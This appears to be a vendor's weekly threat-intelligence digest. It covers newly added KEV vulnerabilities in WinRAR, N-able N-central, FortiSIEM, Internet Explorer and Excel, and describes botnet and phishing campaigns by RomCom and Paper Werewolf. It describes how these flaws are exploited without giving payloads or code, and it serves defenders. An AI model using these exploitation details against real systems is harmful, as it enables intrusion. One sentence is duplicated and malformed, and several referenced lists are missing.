This week’s threat landscape underscores the persistent risks posed by both historic and emerging vulnerabilities. CISA added five flaws to its Known Exploited Vulnerabilities (KEV) catalog, including two decades-old Microsoft bugs, a newly discovered WinRAR flaw, and two critical issues in N-able N-central, a widely used remote monitoring and management (RMM) platform. Meanwhile, Fortinet confirmed that an exploit for its critical FortiSIEM vulnerability is actively circulating in the wild. These developments highlight how attackers continue to target both legacy weaknesses and freshly disclosed flaws, reinforcing the urgent need for timely patching and proactive defense.  

On the botnet front, activity spiked as EnemyBot, Sysrv-k, Andoryu, and Androxgh0st launched aggressive campaigns exploiting flaws in GitLab, Cloud Gateway, and PHP-based applications. Meanwhile, IoT botnets such as Mirai, Bashlite, Tsunami, and BricketBot targeted exposed EirD1000 routers, using mass exploitation to gain footholds and move laterally within enterprise networks.  

Malware campaigns this week spotlighted WinRAR exploits, with RomCom weaponizing a recently discovered zero-day in targeted phishing, and Paper Werewolf leveraging while Paper Werewolf leveraged it alongside an additional WinRAR vulnerability in their attacks.

Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.  

CVE-2025-8088
A Path Traversal Vulnerability in RARLAB WinRAR, affecting the Windows version up to and including 7.12, allows attackers to execute arbitrary code by crafting malicious archive files. Assigned a high CVSS Score of 8.4, this flaw was exploited as a zero-day in the wild before being patched in WinRAR version 7.13. Due to its active exploitation, the vulnerability has been added to the CISA Known Exploited Vulnerabilities(KEV) catalog, underscoring the urgency for users to update to the latest version.  

CVE-2025-8875 and CVE-2025-8876
Two critical vulnerabilities were identified in N-able N-Central, a remote monitoring and management (RMM) platform widely used by Managed Service Providers(MSPs).  

The first, CVE-2025-8875, is an Insecure Deserialization flaw that could lead to arbitrary command execution, while the second, CVE-2025-8876, is a Command Injection Vulnerability arising from improper sanitization of user input, allowing attackers to run arbitrary commands on the system. Both the vulnerabilities have been patched in version 2025.3.1. and 2024.6 HF2. They have also been added to the CISA KEV catalog, indicating active exploitation and highlighting the urgency for organizations to update immediately.

CVE-2025-25256
A Command Injection Vulnerability in the Fortinet FortiSIEM, a widely used Security Information and Event Management (SIEM) platform, allows remote, unauthenticated attackers to execute arbitrary code or system commands. Rated critical with a CVSS Score of 9.8, the flaw arises from improper neutralization of special elements in OS commands, enabling exploitation through crafted CLI requests. With functional exploit code already in the wild, unpatched FortiSIEM instances face severe risk. Fortinet has released patched versions in its advisory and strongly urges immediate upgrades to mitigate active threats.  

CVE-2013-3893
A Resource Management Errors Vulnerability in the Microsoft Internet Explorer, stems from a use-after-free flaw in the SetMouseCapture implementation within mshtml.dll, allowed remote code execution andwas exploited as zero-day way back in 2013. Affecting IE 6 through 11 on Windows XP to Windows 8.1, it enabled attackers to craft malicious JavaScript such as via an ms-help: URL to load hxds.dll and execute arbitrary code. The flaw was leveraged in targeted attacks against high-profile organizations in Japan, highlighting its geopolitical significance. While patched in 2013, Microsoft officially ended Internet Explorer support in 2022, and the vulnerability has now been added to the CISA KEV catalog, underscoring its historical and security significance.

CVE-2007-0671
A Remote Code Execution Vulnerability in the Microsoft Office Excel allowed attackers to compromise systems by enticing users to open specially crafted Excel files. These malicious files, delivered via email attachments or hosted on compromised websites, could trigger code execution on the affected system upon opening. Actively exploited as zero-day at that time, the flaw impacted Microsoft Excel 2000, XP, 2003, and 2004 for Mac, with potential implications for other Office components. Microsoft addressed the issue through a dedicated security bulletin, urging immediate updates to mitigate the risk. The vulnerability has since been added to the CISA KEV catalog, underscoring its exploitation history and the need for patching.

Telemetry collected from Loginsoft sensors were analyzed and processed to derive insights on what is actively being exploited and actively being scanned.  As source of truth, source IPv4 addresses & payloads can be provided on need-to-know basis.

Identified vulnerabilities exploited by botnets, including recent CVEs logged in Misp. Presenting the top 5 CVEs with payloads suggestive of botnet activities, like utilizing wget with IP addresses.

We proactively monitor the vulnerabilities which are targeted by adversaries. Each vulnerability is humanly studied and mapped with Mitre ATT&CK tactics and techniques. Source of information is derived from our vulnerability intelligence platform collected and curated information from various sources such as Twitter, Telegram, OSINT groups, Blogs, Data leak Sites and more.      

CVE-2025-6218 and CVE-2025-8088
ESET reported that the CVE-2025-8088 vulnerability is being actively exploited as a zero-day in spear-phishing campaigns  by the RomCom group (aka Storm-0978, Tropical Scorpius, or UNC2596) to deploy malware variants such as SnipBot variant, RustyClaw, and Mythic agent backdoors. RomCom, a Russian-linked threat actor involved in ransomware, data-theft extortion, and credential-stealing operations, is known for leveraging zero-day vulnerabilities and creating custom malware to facilitate data theft, persistence, and backdoor access.  

In a separate activity cluster, Bi.Zone reported that both CVE-2025-6218 and CVE-2025-8088 have also been exploited by the Paper Werewolf group. Active since 2022, Paper Werewolf targets Russian organizations through phishing emails containing malicious macros, enabling the deployment of tools like PowerRAT for remote access and data exfiltration.

It refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.

1. https://www.cisa.gov/news-events/alerts/2025/08/12/cisa-adds-three-known-exploited-vulnerabilities-catalog
2. https://www.cisa.gov/news-events/alerts/2025/08/13/cisa-adds-two-known-exploited-vulnerabilities-catalog
3. https://www.fortiguard.com/psirt/FG-IR-25-152
4. https://status.n-able.com/2025/08/13/announcing-the-ga-of-n-central-2025-3-1/
5. https://bi.zone/expertise/blog/paper-werewolf-atakuet-rossiyu-s-ispolzovaniem-uyazvimosti-nulevogo-dnya-v-winrar/
6. https://www.welivesecurity.com/en/eset-research/update-winrar-tools-now-romcom-and-others-exploiting-zero-day-vulnerability/
7. https://securityonline.info/winrar-update-zero-day-path-traversal-flaw-cve-2025-8088-actively-exploited-to-deliver-malware/